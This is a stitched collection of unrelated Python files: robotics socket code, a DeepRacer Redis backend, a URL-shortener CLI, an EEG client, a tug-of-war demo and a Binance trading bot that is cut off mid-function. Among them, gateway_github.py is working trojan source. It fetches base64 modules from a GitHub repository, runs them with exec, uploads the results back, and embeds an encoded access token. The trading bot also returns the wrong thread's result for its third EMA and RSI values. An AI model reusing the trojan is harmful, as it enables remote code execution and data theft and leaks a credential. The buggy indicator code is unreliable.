# self._prof.prof('publish', uid=thing['uid'],
# state=thing['state'], ts=ts)
# never carry $all and across component boundaries!
for thing in things:
if '$all' in thing:
del(thing['$all'])
# should we push things downstream, to the next component
if push:
# the push target depends on the state of things, so we need to sort
# the things into buckets by state before pushing them
# now we can push the buckets as bulks
for _state,_things in buckets.items():
# ts = time.time()
if _state in rps.FINAL:
# things in final state are dropped
for thing in _things:
self._log.debug('final %s [%s]', thing['uid'], _state)
self._prof.prof('drop', uid=thing['uid'], state=_state,
ts=ts)
continue
if _state not in self._outputs:
# unknown target state -- error
for thing in _things:
self._log.debug("lost %s [%s]", thing['uid'], _state)
self._prof.prof('lost', uid=thing['uid'], state=_state,
ts=ts)
continue
if not self._outputs[_state]:
# empty output -- drop thing
for thing in _things:
self._log.debug('drop %s [%s]', thing['uid'], _state)
self._prof.prof('drop', uid=thing['uid'], state=_state,
ts=ts)
continue
output = self._outputs[_state]
# push the thing down the drain
self._log.debug('put bulk %s: %s', _state, len(_things))
output.put(_things)
ts = time.time()
for thing in _things:
self._prof.prof('put', uid=thing['uid'], state=_state,
msg=output.name, ts=ts)
# --------------------------------------------------------------------------
#
def publish(self, pubsub, msg):
'''
push information into a publication channel
'''
if not self._publishers.get(pubsub):
raise RuntimeError("no msg route for '%s': %s" % (pubsub, msg))
self._publishers[pubsub].put(pubsub, msg)
# ------------------------------------------------------------------------------
#
class Worker(Component):
'''
A Worker is a Component which cannot change the state of the thing it
handles. Workers are employed as helper classes to mediate between
components, between components and database, and between components and
notification channels.
'''
# --------------------------------------------------------------------------
#
def __init__(self, cfg, session):
Component.__init__(self, cfg=cfg, session=session)
# ------------------------------------------------------------------------------
|
tcpSocket.py
|
#!/usr/bin/env python3
# Copyright 2019 Nina Marie Wahl and Charlotte Heggem.
# Copyright 2019 Norwegian University of Science and Technology.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import threading
import time
import os
import rclpy
import socket
def cl_black(msge): return '\033[30m' + msge + '\033[0m'
def cl_red(msge): return '\033[31m' + msge + '\033[0m'
def cl_green(msge): return '\033[32m' + msge + '\033[0m'
def cl_orange(msge): return '\033[33m' + msge + '\033[0m'
def cl_blue(msge): return '\033[34m' + msge + '\033[0m'
def cl_purple(msge): return '\033[35m' + msge + '\033[0m'
def cl_cyan(msge): return '\033[36m' + msge + '\033[0m'
def cl_lightgrey(msge): return '\033[37m' + msge + '\033[0m'
def cl_darkgrey(msge): return '\033[90m' + msge + '\033[0m'
def cl_lightred(msge): return '\033[91m' + msge + '\033[0m'
def cl_lightgreen(msge): return '\033[92m' + msge + '\033[0m'
def cl_yellow(msge): return '\033[93m' + msge + '\033[0m'
def cl_lightblue(msge): return '\033[94m' + msge + '\033[0m'
def cl_pink(msge): return '\033[95m' + msge + '\033[0m'
def cl_lightcyan(msge): return '\033[96m' + msge + '\033[0m'
class TCPSocket:
def __init__(self, ip, port,node):
self.BUFFER_SIZE = 4000
self.isconnected = False
self.node_name = node
self.ip = ip
self.port = port
self.tcp = None
#Data
self.odometry = []
self.laserScanB1 = []
self.laserScanB4 = []
self.kmp_statusdata = None
self.lbr_statusdata = None
self.lbr_sensordata = []
threading.Thread(target=self.connect_to_socket).start()
def close(self):
self.isconnected = False
def connect_to_socket(self):
print(cl_cyan('Starting up node:'), self.node_name, 'IP:', self.ip, 'Port:', self.port)
try:
self.tcp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server_address= (self.ip,self.port)
self.tcp.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR,1)
self.tcp.bind(server_address)
except:
print(cl_red('Error: ') + "Connection for KUKA cannot assign requested address:", self.ip, self.port)
self.tcp.listen(3)
while (not self.isconnected):
try:
self.connection, client_address = self.tcp.accept()
self.tcp.settimeout(0.01)
self.isconnected = True
except:
t=0
time.sleep(1)
count = 0
while self.isconnected:
try:
last_read_time = time.time() # Keep received time
data = self.recvmsg()
for pack in (data.decode("utf-8")).split(">"): # parsing data pack
cmd_splt = pack.split()
if len(cmd_splt) and cmd_splt[0] == 'odometry':
self.odometry = cmd_splt
#print('odom')
if len(cmd_splt) and cmd_splt[0] == 'laserScan':
if cmd_splt[2] == '1801':
self.laserScanB1.append(cmd_splt)
#print(count)
count = count + 1
elif cmd_splt[2] == '1802':
self.laserScanB4.append(cmd_splt)
count = count + 1
if len(cmd_splt) and cmd_splt[0] == 'kmp_statusdata':
self.kmp_statusdata = cmd_splt
if len(cmd_splt) and cmd_splt[0] == 'lbr_statusdata':
self.lbr_statusdata = cmd_splt
if len(cmd_splt) and cmd_splt[0] == 'lbr_sensordata':
self.lbr_sensordata.append(cmd_splt)
except:
t = 0
print("SHUTTING DOWN")
self.connection.shutdown(socket.SHUT_RDWR)
self.connection.close()
self.tcp.close()
self.isconnected = False
print(cl_lightred('Connection is closed!'))
rclpy.shutdown()
def send(self, cmd):
try:
self.connection.sendall((cmd + '\r\n').encode("UTF-8"))
except:
print(cl_red('Error: ') + "sending message thread failed")
def recvmsg(self):
header_len = 10
msglength=0
byt_len = ""
byt_len = self.connection.recv(header_len)
diff_header = header_len - len(byt_len)
while (diff_header > 0):
byt_len.extend(self.connection.recv(diff_header))
diff_header= header_len-len(byt_len)
msglength = int(byt_len.decode("utf-8")) + 1 #include crocodile and space
msg = ""
if(msglength>0 and msglength<5000):
msg = self.connection.recv(msglength)
diff_msg = msglength - len(msg)
while(diff_msg>0):
newmsg = self.connection.recv(diff_msg)
msg.extend(newmsg)
diff_msg = msglength - len(msg)
return msg
|
deepracer_memory.py
|
from threading import Thread
import pickle
import time
import queue
import redis
import logging
from rl_coach.memories.backend.memory import MemoryBackend
from rl_coach.core_types import Episode
from markov.utils import Logger, json_format_logger, build_system_error_dict
from markov.utils import SIMAPP_MEMORY_BACKEND_EXCEPTION, SIMAPP_EVENT_ERROR_CODE_500
logger = Logger(__name__, logging.INFO).get_logger()
# Channel used by the training worker to request episodes
WORKER_CHANNEL = 'worker_channel'
# The amount of time to wait before querying the socket
POLL_TIME = 0.001
# Since all the data is handled by the physical memory, there is a limit to the number of steps that can
# be contained in a rollout. This number was determined empirically, as it seems rl_coach is making
# a bunch of hard copies of the transitions
MAX_MEMORY_STEPS = 10000
def log_info(message):
''' Helper method that logs the exception
mesage - Message to send to the log
'''
json_format_logger(message, **build_system_error_dict(SIMAPP_MEMORY_BACKEND_EXCEPTION,
SIMAPP_EVENT_ERROR_CODE_500))
def get_endpoint_helper(redis_address, redis_port):
'''Helper method that returns a dict with the address and port
redis_address - address to be returned in the dict
redis_port - Port to be returned in the dict
'''
return {'redis_address': redis_address, 'redis_port': redis_port}
class DeepRacerRolloutBackEnd(MemoryBackend):
''' Class used by the rollout worker to publish data to the training worker'''
def __init__(self, params, num_consecutive_playing_steps):
''' params - Struct containing all the necessary redis parammeters,
see RedisPubSubMemoryBackendParameters
num_consecutive_playing_steps - Struct containing the number of episodes to
collect before performing a training iteration
'''
# List of tuples containing the episode number and the episode data
self.data = list()
# The episode number of the last episode produced by the rollout worker
self.last_episode_num = 0
# The max number of episodes to collect before performing a training iteration
self.total_episodes = num_consecutive_playing_steps.num_steps
# Redis params
self.params = params
# Redis client that will allow us to publish and subscribe to messages
self.data_client = redis.Redis(self.params.redis_address, self.params.redis_port)
# Pubsub object that will allow us to subscribe to the data req channels this
# allow us to get request from the subscriber
self.data_pubsub = self.data_client.pubsub()
# Handle request via call back
self.data_pubsub.subscribe(**{WORKER_CHANNEL: self.data_req_handler})
self.data_pubsub.run_in_thread()
def data_req_handler(self, message):
''' Message handler for training worker request
message - Request from trainer worker containing the desired episode number
'''
episode = -1
try:
episode = pickle.loads(message['data'])
if episode < 0:
log_info("Negative episode index value")
return
if episode < len(self.data):
self.data_client.publish(self.params.channel, pickle.dumps(self.data[episode]))
# If the trainer requests the total episodes we know that the trainer has all the
# episodes so we will reset the data
if episode == self.total_episodes:
del self.data[:]
self.last_episode_num = 0
# Send an ACK letting the trainer know we have reset the data and it is safe
# to train
self.data_client.publish(self.params.channel,
pickle.dumps((self.total_episodes + 1, "")))
except redis.ConnectionError as ex:
logger.info("Redis connection error: {}".format(ex))
except pickle.PickleError as ex:
logger.info("Could not decode/encode trainer request {}".format(ex))
except Exception as ex:
logger.info("Rollout worker data_req_handler {}".format(ex))
def store(self, obj):
''' Stores the data object into the data list along with episode number
obj - Data object to be stored in the data list
'''
self.data.append((self.last_episode_num, obj))
self.last_episode_num += 1
def get_endpoint(self):
'''Returns a dict with the redis address and port '''
return get_endpoint_helper(self.params.redis_address, self.params.redis_port)
class DeepRacerTrainerBackEnd(MemoryBackend):
'''Class used by the training worker to retrieve the data from the rollout worker '''
def __init__(self, params):
''' params - Struct containing all the necessary redis parammeters,
see RedisPubSubMemoryBackendParame
'''
# Redis params
self.params = params
# Track the total steps taken in the rollout
self.rollout_steps = 0
# Episode number whose data is to be retrieved from the rollout worker
self.episode_req = 0
# Episodes in rollout
self.total_episodes_in_rollout = 0
# Queue object to hold data from the rollout worker while waiting to be consumed
self.data_queue = queue.Queue(1)
# Flag to notify the publish worker that data should be requested
self.request_data = False
# Redis client that will allow us to publish and subscribe to messages
self.data_client = redis.Redis(self.params.redis_address, self.params.redis_port)
# Pubsub object that will allow us to subscribe to the data channel and request data
self.data_pubsub = self.data_client.pubsub()
# Handle data rerurning from the rollout worker via callback
self.data_pubsub.subscribe(**{self.params.channel: self.data_handler})
self.data_pubsub.run_in_thread()
# Use a seperate thread to request data
Thread(target=self.publish_worker).start()
def data_handler(self, message):
''' Message handler for data sent from the rollout worker
message - Tuple sent from the rollout worker containing episode number and data
'''
try:
obj = pickle.loads(message['data'])
if isinstance(obj, tuple):
self.data_queue.put_nowait(obj)
except queue.Full:
pass
except Exception as ex:
log_info("Trainer data handler error: {}".format(ex))
def get_rollout_steps(self):
'''Returns the total number of steps in a rollout '''
return self.rollout_steps
def get_total_episodes_in_rollout(self):
'''Return the total number of episodes collected in the rollout '''
return self.total_episodes_in_rollout
def publish_worker(self):
''' Worker responsible for requesting data from the rollout worker'''
while True:
try:
if self.request_data:
# Request the desired episode
self.data_client.publish(WORKER_CHANNEL, pickle.dumps(self.episode_req))
time.sleep(10*POLL_TIME)
except redis.ConnectionError as ex:
log_info("Redis connection error: {}".format(ex))
continue
except pickle.PickleError as ex:
log_info("Could not decode rollout request {}".format(ex))
continue
except Exception as ex:
log_info("Trainer publish worker error: {}".format(ex))
continue
def fetch(self, num_consecutive_playing_steps=None):
''' Retrieves the data from the rollout worker
num_consecutive_playing_steps - Struct containing the number of episodes to
collect before performing a training iteration
'''
episode_counter = 0
step_counter = 0
self.request_data = True
self.rollout_steps = 0
self.total_episodes_in_rollout = 0
while episode_counter <= num_consecutive_playing_steps.num_steps:
try:
obj = self.data_queue.get()
if obj[0] == episode_counter and isinstance(obj[1], Episode):
episode_counter += 1
step_counter += obj[1].length()
self.episode_req = episode_counter
if step_counter <= MAX_MEMORY_STEPS:
self.rollout_steps += obj[1].length()
self.total_episodes_in_rollout += 1
yield from obj[1]
# When we request num_consecutive_playing_steps.num we will get back
# 1 more than the requested index this lets us lknow the trollout worker
# has given us all available data
elif obj[0] == num_consecutive_playing_steps.num_steps + 1:
episode_counter = obj[0]
self.episode_req = 0
self.request_data = False
except Exception as ex:
log_info("Trainer fetch error: {}".format(ex))
continue
def get_endpoint(self):
'''Returns a dict with the redis address and port '''
return get_endpoint_helper(self.params.redis_address, self.params.redis_port)
|
cuthes.py
|
#!/usr/bin/env python3
import json
import os
import itertools
import time
import csv
import threading
import argparse
try:
from bs4 import BeautifulSoup
import requests
import requests_futures
import lxml
except ModuleNotFoundError:
os.system('pip3 install bs4')
os.system('pip3 install requests')
os.system('pip3 install requests-futures')
os.system('pip3 install lxml')
from resources.sites import Shorten, request
from notify import update
def cls():
os.system('cls' if os.name == 'nt' else 'clear')
# First of all, check for updates
update()
# Get the project version by reading a file .version
def get_version():
with open('.version', 'r') as file:
version = 'cuthes: ' + file.read()
return version
def get_arguments():
"""
Parses the main command-line arguments
using argparse
"""
parser = argparse.ArgumentParser()
parser.add_argument(dest="url", nargs="+", metavar="LINK", action="store", help="This is the link you want to shorten.")
parser.add_argument("--save", "-s", dest="save", help="If you use this command, you can save the results according to the file type.")
parser.add_argument('--version', '-v', action='version', version=get_version(), help="It's me showing the version of the project or script.")
parser.add_argument('--tor', '-t', dest='tor', action='store_true', help='Connecting with Tor to make requests from Tor.')
parser.add_argument('--proxy', '-p', dest='proxy', action="store", default=None, help='Make requests through proxy link. socks5://127.0.0.1:1080')
parser.add_argument('--browser', '-b', dest="browser", action="store", default=None, help='It changes the browser for requests. You can choose several browsers. (chrome or firefox or another)')
parser.add_argument('--colorless', dest='no_color', action='store_true', help='Disables colors terminal output.')
options = parser.parse_args()
return options
def loader():
global Done
Done = False
print("\033[s", end="")
for c in itertools.cycle(["⢿", "⣻", "⣽", "⣾", "⣷", "⣯", "⣟", "⡿"]):
if Done:
break
print("\033[u", end="")
print(f"{darkgreen + '[' + reset + c + darkgreen + ']'} {darkgreen + 'Checking The URL...' + reset}")
time.sleep(0.1)
def color(args):
global red
global darkred
global underline
global green
global darkgreen
global reset
global white
global darkwhite
if args.no_color:
# Disable color output.
red = "\033[0;0m"
darkred = "\033[0;0m"
underline = "\033[0;0m"
green = "\033[0;0m"
darkgreen = "\033[0;0m"
reset = "\033[0;0m"
white = "\033[0;0m"
darkwhite = "\033[0;0m"
else:
# Enable color output.
red = "\033[0;31m"
darkred = "\033[1;31m"
underline = "\033[4m"
green = "\033[0;32m"
darkgreen = "\033[1;32m"
reset = "\033[0;0m"
white = "\033[0;37m"
darkwhite = "\033[1;37m"
def sites(args=None):
# Here is
if args.url:
global allsite
global Done
allsite = []
url = args.url
shorten = Shorten(url)
time.sleep(1)
t = threading.Thread(target=loader)
t.start()
allsite.append(shorten.adfly())
allsite.append(shorten.binbuck())
allsite.append(shorten.bitly())
allsite.append(shorten.chilp())
allsite.append(shorten.cleanuri())
allsite.append(shorten.cpmlink())
allsite.append(shorten.cuttus())
allsite.append(shorten.cuttly())
allsite.append(shorten.gcc())
allsite.append(shorten.gg())
allsite.append(shorten.intip())
allsite.append(shorten.isgd())
allsite.append(shorten.linkfox())
allsite.append(shorten.linkmngr())
allsite.append(shorten.linkshortner())
allsite.append(shorten.n9())
allsite.append(shorten.osdb())
allsite.append(shorten.ouoio())
allsite.append(shorten.shortam())
allsite.append(shorten.shortest())
allsite.append(shorten.shortmy())
allsite.append(shorten.shorturl())
allsite.append(shorten.snip())
allsite.append(shorten.tinyurl())
allsite.append(shorten.trimurl())
allsite.append(shorten.u())
allsite.append(shorten.urlz())
allsite.append(shorten.vgd())
allsite.append(shorten.vht())
allsite.append(shorten.vu())
allsite.append(shorten.youtube())
allsite.append(shorten.zzb())
Done = True
for sites in allsite:
parser = json.loads(sites)
name = parser['name']
url = parser['url']
status = parser['status']
if status == 'true':
print(f'[{darkgreen + "+" + reset}] ' + darkgreen + name + ': ' + reset + url)
if status == 'false':
print(f'[{darkred + "-" + reset}] ' + darkgreen + name + ': ' + reset + url)
def contextTypes(file, status, site, url, path):
# In this function, he selects the file type in order to save it correctly without problems
filename = os.path.basename(file)
dot = str(filename).split('.')[1]
if dot == "csv":
writer = csv.writer(path)
if status == 'true':
writer.writerow([site, url])
if status == 'false':
pass
else:
if status == 'true':
path.write(url + '\n')
if status == 'false':
path.write('')
def output(args):
# Here if the user wants to save to a file
if args.save:
os.makedirs(os.path.dirname(args.save), exist_ok=True)
with open(args.save, "w", newline='', encoding="utf-8") as file:
for sites in allsite:
parser = json.loads(sites)
site = parser['name']
status = parser['status']
url = parser['url']
contextTypes(args.save, status, site, url, file)
def result(args):
request(args)
color(args)
sites(args)
output(args)
def run():
# Here is Running
args = get_arguments()
args = result(args)
if args is None:
return
if __name__ == '__main__':
run()
|
main.py
|
from time import sleep
#from subprocess import call
from multiprocessing.managers import ValueProxy
from multiprocessing.synchronize import Event as EventHint
from multiprocessing import Process, Event, Manager
try: # Change process names to something informational when setproctitle is installed.
from setproctitle import setproctitle
except ImportError: # setproctitle isn't installed, processes will use their default names.
setproctitle = None
WIN_NUMBER = 200
SLEEPTIME = 0.05
score = [0, 0]
class bcolors:
HEADER = '\033[95m'
OKBLUE = '\033[94m'
OKCYAN = '\033[96m'
OKGREEN = '\033[92m'
WARNING = '\033[93m'
FAIL = '\033[91m'
ENDC = '\033[0m'
BOLD = '\033[1m'
UNDERLINE = '\033[4m'
def tug(tug_progress: ValueProxy, change: int, done_flag: EventHint = False, name: str = None):
try:
if setproctitle is not None and name:
setproctitle(name)
while not done_flag.is_set():
tug_progress.set(tug_progress.get() + change)
sleep(SLEEPTIME)
except KeyboardInterrupt:
print(f"Stopped: '{name}'") # Suppress KeyboardInterrupt traceback.
def main():
progress = Manager().Value('i', WIN_NUMBER // 2)
done_flag = Event()
tug_right = Process(target=tug, args=(progress, 1, done_flag, "Python | tug right"))
tug_left = Process(target=tug, args=(progress, -1, done_flag, "Python | tug left"))
tug_right.start()
tug_left.start()
if setproctitle is not None:
setproctitle("python | tug print")
while (current_progress := progress.get()) in range(WIN_NUMBER + 1):
print(f"{bcolors.FAIL}({score[0]})\t"
f"{'=' * current_progress}"
f"{bcolors.OKBLUE}{max(score) - min(score)}" # 0
f"{bcolors.OKGREEN}{'=' * (WIN_NUMBER - current_progress)}"
f"\t({score[1]})")
sleep(SLEEPTIME)
#call(['clear']) # Clears the console on UNIX systems; duh!
print(bcolors.BOLD)
if current_progress >= WIN_NUMBER:
print(bcolors.OKGREEN + "Right side won!")
score[1] += 1
else:
print(bcolors.FAIL + "Left side won!")
score[0] += 1
done_flag.set()
tug_right.join(timeout=SLEEPTIME * 10)
tug_left.join(timeout=SLEEPTIME * 10)
tug_right.terminate()
tug_left.terminate()
if __name__ == '__main__':
# main()
# raise SystemExit()
try:
while True:
main()
sleep(3)
except KeyboardInterrupt:
pass # Suppress the traceback.
|
gateway_github.py
|
#!/usr/bin/python
import json
import base64
import sys
import time
import imp
import random
import threading
import queue
import os
from github3 import login
trojan_id = "cfg"
trojan_config = "%s.json" % trojan_id
data_path = "data/%s/" % trojan_id
trojan_modules = []
task_queue = queue.Queue()
configured = False
class GitImporter(object):
def __init__(self):
self.current_module_code = ""
def find_module(self, fullname, path=None):
if configured:
print("[*] Attempting to retrieve % s" % fullname)
new_library = get_file_contents("modules/%s" % fullname)
if new_library is not None:
self.current_module_code = base64.b64decode(new_library)
return self
return None
def load_module(self, name):
module = imp.new_module(name)
exec(self.current_module_code, module.__dict__)
sys.modules[name] = module
return module
def connect_to_github():
tmp_token = "NWQ0MzMwZmI0ZWE4ZmYwZTk4ZjU4YzkxOTk3OTlkYTk2ZDAyYmI5ZQ=="
#print("decode token is % s" % base64.b64decode(tmp_token))
gh = login(username="", password="",
token=base64.b64decode(tmp_token).decode())
repo = gh.repository("Max88888", "python_bhp")
branch = repo.branch("master")
return gh, repo, branch
def get_file_contents(filepath):
gh, repo, branch = connect_to_github()
print("branch link : ", branch.links)
tree = branch.commit.commit.tree.refresh().recurse()
for filename in tree.tree:
if filepath in filename.path:
print("[*] Found file %s" % filepath)
blob = repo.blob(filename._json_data['sha'])
return blob.content
return None
def get_trojan_config():
global configured
config_json = get_file_contents(trojan_config)
config = json.loads(base64.b64decode(config_json))
configured = True
for task in config:
if task['module'] not in sys.modules:
exec("import %s" % task['module'])
return config
def store_module_result(data):
gh, repo, branch = connect_to_github()
remote_path = "data/%s/%d.data" % (trojan_id, random.randint(1000, 100000))
repo.create_file(remote_path, "Commit message",
base64.b64encode(data.encode()))
return
def module_runner(module):
task_queue.put(1)
result = sys.modules[module].run()
task_queue.get()
# store the result in our repo
store_module_result(result)
return
# main trojan loop
sys.meta_path = [GitImporter()]
if task_queue.empty():
config = get_trojan_config()
for task in config:
t = threading.Thread(target=module_runner, args=(task['module'],))
t.start()
time.sleep(random.randint(1, 10))
time.sleep(random.randint(10, 20))
|
DataClient.py
|
import socket
import struct
import threading
import numpy as np
from Online.AmpInterface import AmpDataClient
class Neuracle(AmpDataClient):
UPDATE_INTERVAL = 0.04
BYTES_PER_NUM = 4
BUFFER_LEN = 4 # in secondes
def __init__(self, n_channel=9, samplerate=1000, host='localhost', port=8712):
self.n_channel = n_channel
self.chunk_size = int(self.UPDATE_INTERVAL * samplerate * self.BYTES_PER_NUM * n_channel)
self.__sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM, 0)
self.buffer = []
self.max_buffer_length = int(self.BUFFER_LEN / self.UPDATE_INTERVAL)
self._host = host
self._port = port
# thread lock
self.lock = threading.Lock()
self.__datathread = threading.Thread(target=self.__recv_loop)
# start client
self.config()
def config(self):
self.__sock.connect((self._host, self._port))
self.__run_forever()
def is_active(self):
return self.__sock.fileno() != -1
def close(self):
self.__sock.close()
self.__datathread.join()
def __recv_loop(self):
while self.__sock.fileno() != -1:
try:
data = self.__sock.recv(self.chunk_size)
except OSError:
break
if len(data) % 4 != 0:
continue
self.lock.acquire()
self.buffer.append(data)
# remove old data
if len(self.buffer) == self.max_buffer_length:
del self.buffer[0]
self.lock.release()
def __run_forever(self):
self.__datathread.start()
def get_trial_data(self):
"""
called to copy trial data from buffer
:return:
timestamps: list of timestamp
data: ndarray with shape of (channels, timesteps)
"""
self.lock.acquire()
raw_data = self.buffer.copy()
self.buffer.clear()
self.lock.release()
total_data = b''.join(raw_data)
byte_data = bytearray(total_data)
if len(byte_data) % 4 != 0:
raise ValueError
data = np.frombuffer(byte_data, dtype='<f')
data = np.reshape(data, (-1, self.n_channel))
timestamps = np.nonzero(data[:, -1])[0].tolist()
return timestamps, data[:, :-1].T
|
fastTradeV2.py
|
import logging
import asyncio
from binance.client import Client
from binance_f import RequestClient
from binance_f import SubscriptionClient
from binance_f.constant.test import *
from binance_f.model import *
from binance_f.exception.binanceapiexception import BinanceApiException
from binance_f.base.printobject import *
import time
import threading
import talib as ta
import numpy as np
from datetime import datetime
import curses
import json
import os
from os import path
from talipp.ohlcv import OHLCVFactory
import talipp.indicators as talippIndicator
import random
def dict2obj(d):
'''
https://stackoverflow.com/questions/1305532/convert-nested-python-dict-to-object
'''
if isinstance(d, list):
d = [dict2obj(x) for x in d]
if not isinstance(d, dict):
return d
class C(object):
pass
o = C()
for k in d:
o.__dict__[k] = dict2obj(d[k])
return o
def utc_2_datetime(timestamp):
return '{}({})'.format(datetime.fromtimestamp(int(timestamp)), (str(time.tzname[-1])))
def calculate_ema(np_price_list, indicator_config):
'''
https://blog.csdn.net/qq_37174526/article/details/92414970
# ema1 = ta.EMA(np_price_list, indicator_config['ema']['ema1'])
# ema2 = ta.EMA(np_price_list, indicator_config['ema']['ema2'])
# ema3 = ta.EMA(np_price_list, indicator_config['ema']['ema3'])
'''
ema_task_1 = MyThread(ta.EMA, args=(np_price_list, indicator_config['ema']['ema1']))
ema_task_2 = MyThread(ta.EMA, args=(np_price_list, indicator_config['ema']['ema2']))
ema_task_3 = MyThread(ta.EMA, args=(np_price_list, indicator_config['ema']['ema3']))
ema_task_1.start()
ema_task_2.start()
ema_task_3.start()
ema_task_1.join()
ema_task_2.join()
ema_task_3.join()
ema1 = ema_task_1.get_result()
ema2 = ema_task_2.get_result()
ema3 = ema_task_2.get_result()
return np.array([ema1, ema2, ema3])
def calculate_macd(np_price_list, indicator_config):
macd, macdsignal, macdhist = ta.MACD(np_price_list,
fastperiod=indicator_config['macd']['fastperiod'],
slowperiod=indicator_config['macd']['slowperiod'],
signalperiod=indicator_config['macd']['signalperiod'])
return np.array([macd, macdsignal, macdhist])
def calculate_rsi(np_price_list, indicator_config):
'''
https://blog.csdn.net/qq_37174526/article/details/92414970
# rsi_1 = ta.RSI(np_price_list, self.indicator_config['rsi']['rsi1'])
# rsi_2 = ta.RSI(np_price_list, self.indicator_config['rsi']['rsi2'])
# rsi_3 = ta.RSI(np_price_list, self.indicator_config['rsi']['rsi3'])
'''
res_task_1 = MyThread(ta.RSI, args=(np_price_list, indicator_config['rsi']['rsi1']))
res_task_2 = MyThread(ta.RSI, args=(np_price_list, indicator_config['rsi']['rsi2']))
res_task_3 = MyThread(ta.RSI, args=(np_price_list, indicator_config['rsi']['rsi3']))
res_task_1.start()
res_task_2.start()
res_task_3.start()
res_task_1.join()
res_task_2.join()
res_task_3.join()
res1 = res_task_1.get_result()
res2 = res_task_2.get_result()
res3 = res_task_2.get_result()
return np.array([res1, res2, res3])
def calculate_emv(open_list, high_list, low_list, close_list, volume_list, indicator_config):
try:
length = indicator_config['emv']['length']
divisor = indicator_config['emv']['divisor']
ohlcv = OHLCVFactory.from_matrix2(
[
open_list,
high_list,
low_list,
close_list,
volume_list
]
)
EMV_list = np.array(talippIndicator.EMV(length, divisor, ohlcv))
return EMV_list
except Exception as e:
print("Error calculating EMV: ", e)
return None
def get_indicators(kline_dict, indicator_config):
open_price_list = np.array(kline_dict['open_price_list']).astype(float)
high_price_list = np.array(kline_dict['high_price_list'])
low_price_list = np.array(kline_dict['low_price_list'])
close_price_list = np.array(kline_dict['close_price_list']).astype(float)
volume_list = np.array(kline_dict['volume_list']).astype(float)
MACD_task = MyThread(calculate_macd, args=(close_price_list, indicator_config))
EMA_task = MyThread(calculate_ema, args=(close_price_list, indicator_config))
RSI_task = MyThread(calculate_rsi, args=(close_price_list, indicator_config))
EMV_task = MyThread(calculate_emv, args=(open_price_list, high_price_list, low_price_list, close_price_list, volume_list, indicator_config))
# indicator_task_list = [MACD_task, EMA_task, RSI_task, EMV_task]
indicator_task_list = [MACD_task, EMA_task, RSI_task, EMV_task]
for task in indicator_task_list:
task.start()
for task in indicator_task_list:
task.join()
MACD_result = MACD_task.get_result()
EMA_result = EMA_task.get_result()
RSI_result = RSI_task.get_result()
EMV_result = EMV_task.get_result()
return MACD_result, EMA_result, RSI_result, EMV_result
def current_date_time():
return '{}({})'.format(datetime.now().strftime("%d/%m/%Y %H:%M:%S"), (str(time.tzname[-1])))
def current_utc_time():
return time.time()
def convert_object_to_string(object):
object_dict = (object.__dict__)
string = '====================================================================\n'
for key in object_dict.keys():
string += '{}: {}\n'.format(key, object_dict[key])
return string
def put_to_log(content, path):
'''
https://www.guru99.com/reading-and-writing-files-in-python.html
'''
try:
f=open(path, "a+")
f.write(content)
f.close()
except Exception as e:
print("Logging for {} failed: {}".format(content, e))
class MyThread(threading.Thread):
'''
https://blog.csdn.net/qq_37174526/article/details/92414970
'''
def __init__(self, func, args):
super(MyThread, self).__init__()
self.func = func
self.args = args
def run(self):
self.result = self.func(*self.args)
def get_result(self):
try:
return self.result
except Exception:
return None
class fastTrade:
def __init__(self, config):
self.__paried_symbol = config['paried_symbol']
self.__asset_symbol = config['asset_symbol']
self.__starting_asset_value = config['starting_asset_value']
self.__api_key = config['api_key']
self.__api_secret = config['api_secret']
self.__interval = config['interval']
self.__leverage = config['leverage']
self.__initial_data_num = config['initial_data_num']
self.__acc_profit = 0
self.__price_anneal = config['price_anneal']
self.__order_timeout = config['order_timeout']
self.__first_order = True
self.indicator_config = config['indicator_config']
self.__recommendation_log_path = None
self.__order_log_path = None
self.__error_log_path = None
self.__position_log_path = None
self.__profit_log_path = None
self.__comission_rate = 0.0002 + 0.0004 + 0.0002
self.__latest_data_update_timestamp = 0
self.__latest_data_analysis_timestamp = 0
self.__latest_depth_update_timestamp = 0
self.order_update_list = []
self.account_update_list = []
self.depth_object = None
self.margin = '===================================================================='
self.target_profit_dict = config['target_profit']
self.__stop_loss_ratio = config['stop_loss_ratio']
self.__level_1_target_proofit = self.target_profit_dict['level1']
self.__level_2_target_proofit = self.target_profit_dict['level2']
self.__level_3_target_proofit = self.target_profit_dict['level3']
self.indicator_dict = dict()
self.finished_position_dict = {
'''
'uniqueOrderId': {
'side': 'SIDE',
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'relatedOrderID': {}
}
'''
}
self.current_position_dict = {}
'''
'uniqueOrderId': {
'uniqueOrderId': None
'level': 1, 2, or 3
'positionSide': 'SIDE',
'trigeredPrice': -99999
'entryPrice': -99999,
'exitPrice': -99999,
'quantity': 0,
'relatedOrderID': {}
'comission': 999
}
...
'''
self.current_recommendation = {
'short': {
'updated_time': 0,
'level': 0,
'price': None
},
'long': {
'updated_time': 0,
'level': 0,
'price': None
}
}
# Need to be updated automatically
self.client = None
self.request_client = None
self.listen_key = None
self.exchange_info = None
self.paired_asset_info = None
self.account_info = None
self.sub_client = None
self.kline_info = {
'kline_list': {
'open_price_list': [],
'high_price_list': [],
'low_price_list': [],
'close_price_list': [],
'quoteAssetVolume_list': [],
'volume_list': [],
'takerBuyBaseAssetVolume_list': [],
'takerBuyQuoteAssetVolume_list': [],
'numTrades_list': []
},
'latest_time': 0
}
'''
"pricePrecision": 5, // 价格小数点位数
"quantityPrecision": 0, // 数量小数点位数
"baseAssetPrecision": 8, // 标的资产精度
"quotePrecision": 8, // 报价资产精度
'''
self.__pricePrecision = None
self.__quantityPrecision = None
self.__baseAssetPrecision = None
self.__quotePrecision = None
# self.__asset_balance = 0
# self.__remaining = 0
def update_config_info(self):
if self.sub_client != None:
self.sub_client.unsubscribe_all()
self.update_listen_key()
self.update_client()
self.update_exchange_info()
self.update_account_info()
self.get_historical_kline()
print('========== Succeed updating trading config ==========')
def make_dir(self):
'''
https://www.guru99.com/reading-and-writing-files-in-python.html
'''
try:
current_time = current_utc_time()
folder_name = str(int(current_time))
